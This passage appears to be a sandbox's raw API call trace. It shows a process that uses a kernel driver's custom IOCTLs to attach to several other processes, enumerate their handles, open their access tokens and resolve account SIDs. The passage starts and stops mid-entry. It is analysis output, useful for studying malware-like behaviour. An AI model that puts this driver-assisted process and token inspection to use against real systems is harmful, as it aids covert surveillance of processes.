cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.390] CloseHandle (hObject=0xc4) returned 1 [0226.390] CloseHandle (hObject=0xc8) returned 1 [0226.390] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.390] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.390] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.390] PsAcquireProcessExitSynchronization () returned 0x0 [0226.390] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880052b35d0) [0226.391] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800204c810, HandleInformation=0x0) returned 0x0 [0226.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.391] PsReleaseProcessExitSynchronization () returned 0x2 [0226.391] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0226.391] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.391] ObfDereferenceObject (Object=0xfffffa800204c810) returned 0x1 [0226.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.391] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.391] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.391] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0226.391] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.391] PsAcquireProcessExitSynchronization () returned 0x0 [0226.391] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880052b35d0) [0226.391] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020507e0, HandleInformation=0x0) returned 0x0 [0226.391] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.391] PsReleaseProcessExitSynchronization () returned 0x2 [0226.391] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0226.391] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.391] ObfDereferenceObject (Object=0xfffffa80020507e0) returned 0x1 [0226.391] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.392] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.392] PsLookupProcessByProcessId (in: ProcessId=0x36c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.392] PsAcquireProcessExitSynchronization () returned 0x0 [0226.392] KeStackAttachProcess (in: PROCESS=0xfffffa8002046060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002046060, ApcState=0xfffff880052b35d0) [0226.392] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.392] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.392] PsReleaseProcessExitSynchronization () returned 0x2 [0226.392] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x12 [0226.392] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.392] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.392] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.392] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x51c) returned 0xc8 [0226.392] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.392] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800205e5f0, HandleInformation=0x0) returned 0x0 [0226.392] ObOpenObjectByPointer (in: Object=0xfffffa800205e5f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.393] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x14 [0226.393] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.393] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.393] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.393] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.393] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.395] CloseHandle (hObject=0xc4) returned 1 [0226.395] CloseHandle (hObject=0xc8) returned 1 [0226.395] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.395] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.395] PsAcquireProcessExitSynchronization () returned 0x0 [0226.395] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880052b35d0) [0226.396] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002063f20, HandleInformation=0x0) returned 0x0 [0226.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.396] PsReleaseProcessExitSynchronization () returned 0x2 [0226.396] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0226.396] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.396] ObfDereferenceObject (Object=0xfffffa8002063f20) returned 0x1 [0226.396] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.396] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.396] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0226.396] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.396] PsAcquireProcessExitSynchronization () returned 0x0 [0226.396] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880052b35d0) [0226.396] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002063990, HandleInformation=0x0) returned 0x0 [0226.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.396] PsReleaseProcessExitSynchronization () returned 0x2 [0226.396] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0226.396] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.397] ObfDereferenceObject (Object=0xfffffa8002063990) returned 0x1 [0226.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.397] PsLookupProcessByProcessId (in: ProcessId=0x51c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.397] PsAcquireProcessExitSynchronization () returned 0x0 [0226.397] KeStackAttachProcess (in: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800205e5f0, ApcState=0xfffff880052b35d0) [0226.397] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.397] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.397] PsReleaseProcessExitSynchronization () returned 0x2 [0226.397] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x12 [0226.397] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.397] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xc8 [0226.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.398] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002084b30, HandleInformation=0x0) returned 0x0 [0226.398] ObOpenObjectByPointer (in: Object=0xfffffa8002084b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.398] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x14 [0226.398] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.398] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.398] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.398] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.398] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.400] CloseHandle (hObject=0xc4) returned 1 [0226.400] CloseHandle (hObject=0xc8) returned 1 [0226.401] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.401] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.401] PsAcquireProcessExitSynchronization () returned 0x0 [0226.401] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880052b35d0) [0226.401] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800204c960, HandleInformation=0x0) returned 0x0 [0226.401] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.401] PsReleaseProcessExitSynchronization () returned 0x2 [0226.401] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0226.401] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.401] ObfDereferenceObject (Object=0xfffffa800204c960) returned 0x1 [0226.402] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.402] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.402] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0226.402] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.402] PsAcquireProcessExitSynchronization () returned 0x0 [0226.402] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880052b35d0) [0226.402] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002082400, HandleInformation=0x0) returned 0x0 [0226.402] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.402] PsReleaseProcessExitSynchronization () returned 0x2 [0226.402] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0226.402] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.402] ObfDereferenceObject (Object=0xfffffa8002082400) returned 0x1 [0226.402] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.402] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.403] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.403] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.403] PsLookupProcessByProcessId (in: ProcessId=0x7fc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.403] PsAcquireProcessExitSynchronization () returned 0x0 [0226.403] KeStackAttachProcess (in: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002084b30, ApcState=0xfffff880052b35d0) [0226.403] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.403] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.403] PsReleaseProcessExitSynchronization () returned 0x2 [0226.403] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x12 [0226.403] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.403] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.403] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.403] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6c0) returned 0xc8 [0226.403] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.403] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800208e620, HandleInformation=0x0) returned 0x0 [0226.403] ObOpenObjectByPointer (in: Object=0xfffffa800208e620, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.403] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x14 [0226.403] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.404] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.404] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.404] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.404] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.406] CloseHandle (hObject=0xc4) returned 1 [0226.406] CloseHandle (hObject=0xc8) returned 1 [0226.406] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.406] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.406] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.406] PsAcquireProcessExitSynchronization () returned 0x0 [0226.406] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880052b35d0) [0226.406] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020948d0, HandleInformation=0x0) returned 0x0 [0226.406] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.406] PsReleaseProcessExitSynchronization () returned 0x2 [0226.406] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0226.406] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.406] ObfDereferenceObject (Object=0xfffffa80020948d0) returned 0x1 [0226.407] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.407] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.407] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.407] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0226.407] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.407] PsAcquireProcessExitSynchronization () returned 0x0 [0226.407] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800208e620, ApcState=0xfffff880052b35d0) [0226.407] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002086800, HandleInformation=0x0) returned 0x0 [0226.407] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.407] PsReleaseProcessExitSynchronization () returned 0x2 [0226.407] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x12 [0226.407] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.407] ObfDereferenceObject (Object=0xfffffa8002086800) returned 0x1 [0226.407] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.407] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.407] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.407] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.407] PsLookupProcessByProcessId (in: ProcessId=0x6c0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.407] PsAcquireProcessExitSynchronization () returned 0x0 [0226.407] KeStackAttachProcess (in: PROCESS=0xfffffa800208e620, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800208e620, 